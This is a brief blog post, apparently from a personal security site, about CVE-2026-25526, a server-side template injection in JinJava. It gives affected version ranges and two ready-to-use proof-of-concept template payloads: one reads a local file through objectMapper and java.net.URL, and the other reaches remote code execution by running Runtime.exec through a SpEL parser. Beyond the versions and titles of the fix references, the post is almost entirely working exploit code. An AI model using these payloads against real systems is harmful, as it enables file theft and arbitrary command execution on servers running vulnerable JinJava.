CVE-2026-25526 JinJava SSTI

exp3n5ive Lv2
  2026-02-12 14:59:15 2026-02-12 14:59:15 Created   2026-02-12 15:10:19 2026-02-12 15:10:19 Updated    139 Words  1 Mins  

影响版本

2.8.0 <= JinJava < 2.8.3

JinJava < 2.7.6

POC

文件读取

1
{% for _, config, class in ____int3rpr3t3r____ %}{{ config.objectMapper.convertValue(config.objectMapper.readValue('"file:///C:/windows/win.ini"',config.objectMapper.getTypeFactory().constructFromCanonical("java.net.URL")).openStream().readAllBytes(),config.objectMapper.getTypeFactory().constructFromCanonical("java.lang.String")) }}{% endfor %}

RCE

1
{% for _, config, class in ____int3rpr3t3r____ %}{{ config.objectMapper.readValue('{}',config.objectMapper.getTypeFactory().constructFromCanonical("org.springframework.expression.spel.standard.SpelExpressionParser")).parseExpression("T(java.lang.Runtime).getRuntime().exec('calc')").getValue() }}{% endfor %}

Reference

Arbitrary Java Execution via JinJava Bypass through ForTag
Prevent JinjavaBeanELResolver restriction bypassing through ForTag’s loopVars

  • Title: CVE-2026-25526 JinJava SSTI
  • Author: exp3n5ive
  • Created at : 2026-02-12 14:59:15
  • Updated at : 2026-02-12 15:10:19
  • Link: https://exp3n5ive.github.io/2026/02/12/CVE-2026-25526 JinJava SSTI/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
CVE-2026-25526 JinJava SSTI
  1. 影响版本
  2. POC
    1. 文件读取
    2. RCE
  3. Reference